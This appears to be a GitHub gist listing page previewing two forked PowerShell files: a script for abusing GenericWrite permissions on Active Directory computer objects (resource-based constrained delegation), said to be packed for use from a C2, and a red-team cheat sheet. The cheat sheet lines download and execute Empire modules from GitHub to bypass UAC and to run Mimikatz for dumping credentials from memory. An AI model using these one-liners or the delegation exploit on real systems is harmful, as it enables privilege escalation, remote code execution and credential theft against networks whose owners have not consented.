drwscefn
/ GenericWriteRBCD.ps1
Created
September 28, 2022 13:50
— forked from klezVirus/GenericWriteRBCD.ps1
Exploit the GenericWrite DACL on a computer object (from a user or computer account)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-GenericWriteRBCD | |
| { | |
| <# Based on Gist by dirkjan - Packed to be used from a C2 #> | |
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory=$True, HelpMessage="The name for the newly created computer")] | |
| [string]$Computer, |
drwscefn
/ RedTeam_CheatSheet.ps1
Created
August 19, 2022 18:26
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |